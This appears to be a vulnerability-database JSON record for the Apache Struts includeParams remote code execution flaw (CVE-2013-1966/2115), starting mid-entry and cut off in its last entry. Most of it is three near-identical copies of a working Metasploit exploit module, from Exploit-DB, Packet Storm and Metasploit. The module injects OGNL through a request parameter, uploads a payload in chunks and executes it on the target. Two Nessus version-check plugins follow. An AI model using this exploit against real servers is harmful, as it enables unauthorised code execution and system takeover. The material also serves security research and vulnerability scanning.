Discovery\r\n 'Douglas Rodrigues', # Vulnerability Discovery\r\n 'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2115'],\r\n [ 'CVE', '2013-1966'],\r\n [ 'OSVDB', '93645'],\r\n [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-014'],\r\n [ 'URL', 'http://struts.apache.org/development/2.x/docs/s2-013.html']\r\n ],\r\n 'Platform' => [ 'win', 'linux', 'java'],\r\n 'Privileged' => true,\r\n 'Targets' =>\r\n [\r\n ['Windows Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n ['Linux Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ],\r\n [ 'Java Universal',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'java'\r\n },\r\n ]\r\n ],\r\n 'DisclosureDate' => 'May 24 2013',\r\n 'DefaultTarget' => 2))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),\r\n OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', \"/struts2-blank/example/HelloWorld.action\"]),\r\n OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]),\r\n OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])\r\n ], self.class)\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n inject_string = @inject.gsub(/CMD/,cmd)\r\n uri = normalize_uri(target_uri.path)\r\n req_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] }\r\n case datastore['HTTPMETHOD']\r\n when 'POST'\r\n req_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject_string }})\r\n when 'GET'\r\n req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }})\r\n end\r\n\r\n # Display a nice \"progress bar\" instead of message spam\r\n case @notify_flag\r\n when 0\r\n print_status(\"Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload\")\r\n @notify_flag = 1\r\n when 1\r\n print(\".\") # Progress dots\r\n when 2\r\n print_status(\"Payload upload complete\")\r\n end\r\n\r\n return send_request_cgi(req_hash) #Used for check function.\r\n end\r\n\r\n def exploit\r\n #initialise some base vars\r\n @inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\"\r\n @java_upload_part_cmd = \"#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()\"\r\n #Set up generic values.\r\n @payload_exe = rand_text_alphanumeric(4+rand(4))\r\n pl_exe = generate_payload_exe\r\n append = false\r\n #Now arch specific...\r\n case target['Platform']\r\n when 'linux'\r\n @payload_exe = \"/tmp/#{@payload_exe}\"\r\n chmod_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n exec_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n when 'java'\r\n @payload_exe << \".jar\"\r\n pl_exe = payload.encoded_jar.pack\r\n exec_cmd = \"\"\r\n exec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,true),\"\r\n exec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,false),\"\r\n exec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\"\r\n exec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\r\n exec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\"\r\n exec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\r\n when 'windows'\r\n @payload_exe = \"./#{@payload_exe}.exe\"\r\n exec_cmd = \"@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')\"\r\n else\r\n fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')\r\n end\r\n\r\n print_status(\"Preparing payload...\")\r\n # Now with all the arch specific stuff set, perform the upload.\r\n # Need to calculate amount to allocate for non-dynamic parts of the URL.\r\n # Fixed strings are tokens used for substitutions.\r\n append_length = append ? \"true\".length : \"false\".length # Gets around the boolean/string issue\r\n sub_from_chunk = append_length + ( @java_upload_part_cmd.length - \"FILENAME\".length - \"APPEND\".length - \"BUFFER\".length )\r\n sub_from_chunk += ( @inject.length - \"CMD\".length ) + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length\r\n case datastore['HTTPMETHOD']\r\n when 'GET'\r\n chunk_length = 2048 - sub_from_chunk # Using the max request length of 2048 for IIS, subtract all the \"static\" URL items.\r\n #This lets us know the length remaining for our base64'd payloads\r\n chunk_length = ((chunk_length/4).floor)*3\r\n when 'POST'\r\n chunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about the size of the URL anymore.\r\n end\r\n @notify_flag = 0\r\n while pl_exe.length > chunk_length\r\n java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)\r\n pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]\r\n append = true\r\n end\r\n java_upload_part(pl_exe,@payload_exe,append)\r\n execute_command(chmod_cmd) if target['Platform'] == 'linux'\r\n print_line() # new line character, after progress bar.\r\n @notify_flag = 2 # upload is complete, next command we're going to execute the uploaded file.\r\n execute_command(exec_cmd)\r\n register_files_for_cleanup(@payload_exe)\r\n end\r\n\r\n def java_upload_part(part, filename, append = false)\r\n cmd = @java_upload_part_cmd.gsub(/FILENAME/,filename)\r\n append = append ? \"true\" : \"false\" # converted for the string replacement.\r\n cmd = cmd.gsub!(/APPEND/,append)\r\n cmd = cmd.gsub!(/BUFFER/,Rex::Text.encode_base64(part))\r\n execute_command(cmd)\r\n end\r\n\r\n def check\r\n #initialise some base vars\r\n @inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\"\r\n print_status(\"Performing Check...\")\r\n sleep_time = datastore['CHECK_SLEEPTIME']\r\n check_cmd = \"@java.lang.Thread@sleep(#{sleep_time * 1000})\"\r\n t1 = Time.now\r\n print_status(\"Asking remote server to sleep for #{sleep_time} seconds\")\r\n response = execute_command(check_cmd)\r\n t2 = Time.now\r\n delta = t2 - t1\r\n\r\n\r\n if response.nil?\r\n return Exploit::CheckCode::Safe\r\n elsif delta < sleep_time\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Appears\r\n end\r\n end\r\n\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/25980/"}], "packetstorm": [{"lastseen": "2016-12-05T22:20:28", "description": "", "published": "2013-06-02T00:00:00", "type": "packetstorm", "title": "Apache Struts includeParams Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2013-06-02T00:00:00", "id": "PACKETSTORM:121847", "href": "https://packetstormsecurity.com/files/121847/Apache-Struts-includeParams-Remote-Code-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts includeParams Remote Code Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in Apache Struts \nversions < 2.3.14.2. A specifically crafted request parameter can be used to inject \narbitrary OGNL code into the stack bypassing Struts and OGNL library protections. \nWhen targeting an action which requires interaction through GET the payload should \nbe split having into account the uri limits. In this case, if the rendered jsp has \nmore than one point of injection, it could result in payload corruption. It should \nhappen only when the payload is larger than the uri length. \n}, \n'Author' => \n[ \n# This vulnerability was also discovered by unknown members of: \n# 'Coverity security Research Laboratory' \n# 'NSFOCUS Security Team' \n'Eric Kobrin', # Vulnerability Discovery \n'Douglas Rodrigues', # Vulnerability Discovery \n'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-2115'], \n[ 'CVE', '2013-1966'], \n[ 'OSVDB', '93645'], \n[ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-014'], \n[ 'URL', 'http://struts.apache.org/development/2.x/docs/s2-013.html'] \n], \n'Platform' => [ 'win', 'linux', 'java'], \n'Privileged' => true, \n'Targets' => \n[ \n['Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n], \n[ 'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n}, \n] \n], \n'DisclosureDate' => 'May 24 2013', \n'DefaultTarget' => 2)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]), \nOptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', \"/struts2-blank/example/HelloWorld.action\"]), \nOptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]), \nOptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) \n], self.class) \nend \n \ndef execute_command(cmd, opts = {}) \ninject_string = @inject.gsub(/CMD/,cmd) \nuri = normalize_uri(target_uri.path) \nreq_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] } \ncase datastore['HTTPMETHOD'] \nwhen 'POST' \nreq_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject_string }}) \nwhen 'GET' \nreq_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }}) \nend \n \n# Display a nice \"progress bar\" instead of message spam \ncase @notify_flag \nwhen 0 \nprint_status(\"Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload\") \n@notify_flag = 1 \nwhen 1 \nprint(\".\") # Progress dots \nwhen 2 \nprint_status(\"Payload upload complete\") \nend \n \nreturn send_request_cgi(req_hash) #Used for check function. \nend \n \ndef exploit \n#initialise some base vars \n@inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\" \n@java_upload_part_cmd = \"#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()\" \n#Set up generic values. \n@payload_exe = rand_text_alphanumeric(4+rand(4)) \npl_exe = generate_payload_exe \nappend = false \n#Now arch specific... \ncase target['Platform'] \nwhen 'linux' \n@payload_exe = \"/tmp/#{@payload_exe}\" \nchmod_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\" \nwhen 'java' \n@payload_exe << \".jar\" \npl_exe = payload.encoded_jar.pack \nexec_cmd = \"\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,true),\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,false),\" \nexec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\" \nexec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\" \nexec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\" \nexec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\" \nwhen 'windows' \n@payload_exe = \"./#{@payload_exe}.exe\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')\" \nelse \nfail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!') \nend \n \nprint_status(\"Preparing payload...\") \n# Now with all the arch specific stuff set, perform the upload. \n# Need to calculate amount to allocate for non-dynamic parts of the URL. \n# Fixed strings are tokens used for substitutions. \nappend_length = append ? \"true\".length : \"false\".length # Gets around the boolean/string issue \nsub_from_chunk = append_length + ( @java_upload_part_cmd.length - \"FILENAME\".length - \"APPEND\".length - \"BUFFER\".length ) \nsub_from_chunk += ( @inject.length - \"CMD\".length ) + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length \ncase datastore['HTTPMETHOD'] \nwhen 'GET' \nchunk_length = 2048 - sub_from_chunk # Using the max request length of 2048 for IIS, subtract all the \"static\" URL items. \n#This lets us know the length remaining for our base64'd payloads \nchunk_length = ((chunk_length/4).floor)*3 \nwhen 'POST' \nchunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about the size of the URL anymore. \nend \n@notify_flag = 0 \nwhile pl_exe.length > chunk_length \njava_upload_part(pl_exe[0,chunk_length],@payload_exe,append) \npl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length] \nappend = true \nend \njava_upload_part(pl_exe,@payload_exe,append) \nexecute_command(chmod_cmd) if target['Platform'] == 'linux' \nprint_line() # new line character, after progress bar. \n@notify_flag = 2 # upload is complete, next command we're going to execute the uploaded file. \nexecute_command(exec_cmd) \nregister_files_for_cleanup(@payload_exe) \nend \n \ndef java_upload_part(part, filename, append = false) \ncmd = @java_upload_part_cmd.gsub(/FILENAME/,filename) \nappend = append ? \"true\" : \"false\" # converted for the string replacement. \ncmd = cmd.gsub!(/APPEND/,append) \ncmd = cmd.gsub!(/BUFFER/,Rex::Text.encode_base64(part)) \nexecute_command(cmd) \nend \n \ndef check \n#initialise some base vars \n@inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\" \nprint_status(\"Performing Check...\") \nsleep_time = datastore['CHECK_SLEEPTIME'] \ncheck_cmd = \"@java.lang.Thread@sleep(#{sleep_time * 1000})\" \nt1 = Time.now \nprint_status(\"Asking remote server to sleep for #{sleep_time} seconds\") \nresponse = execute_command(check_cmd) \nt2 = Time.now \ndelta = t2 - t1 \n \n \nif response.nil? \nreturn Exploit::CheckCode::Safe \nelsif delta < sleep_time \nreturn Exploit::CheckCode::Safe \nelse \nreturn Exploit::CheckCode::Appears \nend \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121847/struts_include_params.rb.txt"}], "metasploit": [{"lastseen": "2020-10-15T01:28:42", "description": "This module exploits a remote command execution vulnerability in Apache Struts versions < 2.3.14.2. A specifically crafted request parameter can be used to inject arbitrary OGNL code into the stack bypassing Struts and OGNL library protections. When targeting an action which requires interaction through GET, the payload should be split, taking into account the URI limits. In this case, if the rendered JSP has more than one point of injection, it could result in payload corruption. This should happen only when the payload is larger than the URI length.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Apache Struts includeParams Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/MULTI/HTTP/STRUTS_INCLUDE_PARAMS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts includeParams Remote Code Execution',\n 'Description' => %q{\n This module exploits a remote command execution vulnerability in Apache Struts\n versions < 2.3.14.2. A specifically crafted request parameter can be used to inject\n arbitrary OGNL code into the stack bypassing Struts and OGNL library protections.\n When targeting an action which requires interaction through GET, the payload should\n be split, taking into account the URI limits. In this case, if the rendered JSP has\n more than one point of injection, it could result in payload corruption. This should\n happen only when the payload is larger than the URI length.\n },\n 'Author' =>\n [\n # This vulnerability was also discovered by unknown members of:\n # 'Coverity security Research Laboratory'\n # 'NSFOCUS Security Team'\n 'Eric Kobrin', # Vulnerability Discovery\n 'Douglas Rodrigues', # Vulnerability Discovery\n 'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-2115'],\n [ 'CVE', '2013-1966'],\n [ 'OSVDB', '93645'],\n [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-014'],\n [ 'URL', 'http://struts.apache.org/development/2.x/docs/s2-013.html']\n ],\n 'Platform' => %w{ java linux win },\n 'Privileged' => true,\n 'Targets' =>\n [\n ['Windows Universal',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'win'\n }\n ],\n ['Linux Universal',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux'\n }\n ],\n [ 'Java Universal',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => 'java'\n },\n ]\n ],\n 'DisclosureDate' => '2013-05-24',\n 'DefaultTarget' => 2))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),\n OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', \"/struts2-blank/example/HelloWorld.action\"]),\n OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]),\n OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])\n ])\n end\n\n def execute_command(cmd, opts = {})\n inject_string = @inject.gsub(/CMD/,cmd)\n uri = normalize_uri(target_uri.path)\n req_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] }\n case datastore['HTTPMETHOD']\n when 'POST'\n req_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject_string }})\n when 'GET'\n req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }})\n end\n\n # Display a nice \"progress bar\" instead of message spam\n case @notify_flag\n when 0\n print_status(\"Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload\")\n @notify_flag = 1\n when 1\n print(\".\") # Progress dots\n when 2\n print_status(\"Payload upload complete\")\n end\n\n return send_request_cgi(req_hash) #Used for check function.\n end\n\n def exploit\n #initialise some base vars\n @inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\"\n @java_upload_part_cmd = \"#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()\"\n #Set up generic values.\n @payload_exe = rand_text_alphanumeric(4+rand(4))\n pl_exe = generate_payload_exe\n append = false\n #Now arch specific...\n case target['Platform']\n when 'linux'\n @payload_exe = \"/tmp/#{@payload_exe}\"\n chmod_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\"\n exec_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\"\n when 'java'\n @payload_exe << \".jar\"\n pl_exe = payload.encoded_jar.pack\n exec_cmd = \"\"\n exec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\n exec_cmd << \"#q.setAccessible(true),#q.set(null,true),\"\n exec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\n exec_cmd << \"#q.setAccessible(true),#q.set(null,false),\"\n exec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\"\n exec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\n exec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\"\n exec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\n when 'win'\n @payload_exe = \"./#{@payload_exe}.exe\"\n exec_cmd = \"@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')\"\n else\n fail_with(Failure::NoTarget, 'Unsupported target platform!')\n end\n\n print_status(\"Preparing payload...\")\n # Now with all the arch specific stuff set, perform the upload.\n # Need to calculate amount to allocate for non-dynamic parts of the URL.\n # Fixed strings are tokens used for substitutions.\n append_length = append ? \"true\".length : \"false\".length # Gets around the boolean/string issue\n sub_from_chunk = append_length + ( @java_upload_part_cmd.length - \"FILENAME\".length - \"APPEND\".length - \"BUFFER\".length )\n sub_from_chunk += ( @inject.length - \"CMD\".length ) + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length\n case datastore['HTTPMETHOD']\n when 'GET'\n chunk_length = 2048 - sub_from_chunk # Using the max request length of 2048 for IIS, subtract all the \"static\" URL items.\n #This lets us know the length remaining for our base64'd payloads\n chunk_length = ((chunk_length/4).floor)*3\n when 'POST'\n chunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about the size of the URL anymore.\n end\n @notify_flag = 0\n while pl_exe.length > chunk_length\n java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)\n pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]\n append = true\n end\n java_upload_part(pl_exe,@payload_exe,append)\n execute_command(chmod_cmd) if target['Platform'] == 'linux'\n print_line() # new line character, after progress bar.\n @notify_flag = 2 # upload is complete, next command we're going to execute the uploaded file.\n execute_command(exec_cmd)\n register_files_for_cleanup(@payload_exe)\n end\n\n def java_upload_part(part, filename, append = false)\n cmd = @java_upload_part_cmd.gsub(/FILENAME/,filename)\n append = append ? \"true\" : \"false\" # converted for the string replacement.\n cmd = cmd.gsub!(/APPEND/,append)\n cmd = cmd.gsub!(/BUFFER/,Rex::Text.encode_base64(part))\n execute_command(cmd)\n end\n\n def check\n #initialise some base vars\n @inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\"\n vprint_status(\"Performing Check...\")\n sleep_time = datastore['CHECK_SLEEPTIME']\n check_cmd = \"@java.lang.Thread@sleep(#{sleep_time * 1000})\"\n t1 = Time.now\n vprint_status(\"Asking remote server to sleep for #{sleep_time} seconds\")\n response = execute_command(check_cmd)\n t2 = Time.now\n delta = t2 - t1\n\n\n if response.nil?\n return Exploit::CheckCode::Safe\n elsif delta < sleep_time\n return Exploit::CheckCode::Safe\n else\n return Exploit::CheckCode::Vulnerable\n end\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts_include_params.rb"}], "nessus": [{"lastseen": "2020-09-26T10:43:36", "description": "The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.14.2. It, therefore, is affected by multiple\nvulnerabilities including a remote command execution vulnerability\nand a cross-site scripting (XSS) vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-10T00:00:00", "title": "Apache Struts 2.x < 2.3.14.2 Multiple Vulnerabilities (S2-014)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2018-09-10T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_2.NASL", "href": "https://www.tenable.com/plugins/nessus/117364", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117364);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/25\");\n\n script_cve_id(\"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n\n script_name(english:\"Apache Struts 2.x < 2.3.14.2 Multiple Vulnerabilities (S2-014)\");\n script_summary(english:\"Checks the Struts 2 version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.14.2. It, therefore, is affected by multiple\nvulnerabilities including a remote command execution vulnerability\nand a cross-site scripting (XSS) vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-014\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.14.2 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2115\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts IncludeParams < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts includeParams Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n \n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.14.1\", \"fixed_version\" : \"2.3.14.2\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE});\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:28:56", "description": "The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to a flaw in the evaluation of an OGNL expression, a\nremote, unauthenticated attacker can exploit this issue to execute\narbitrary commands on the remote web server by sending a specially\ncrafted HTTP request. \n\nNote this issue exists because of an incomplete fix for CVE-2013-1966. \n\nNote that this version of Struts 2 is reportedly also affected by\nmultiple cross-site scripting (XSS) vulnerabilities as well as session\naccess and manipulation attacks; however, Nessus has not tested for\nthese issues. \n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.", "edition": 26, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-06-19T00:00:00", "title": "Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1966", "CVE-2013-1965", "CVE-2013-2115"], "modified": "2013-06-19T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_2_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/66935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66935);\n 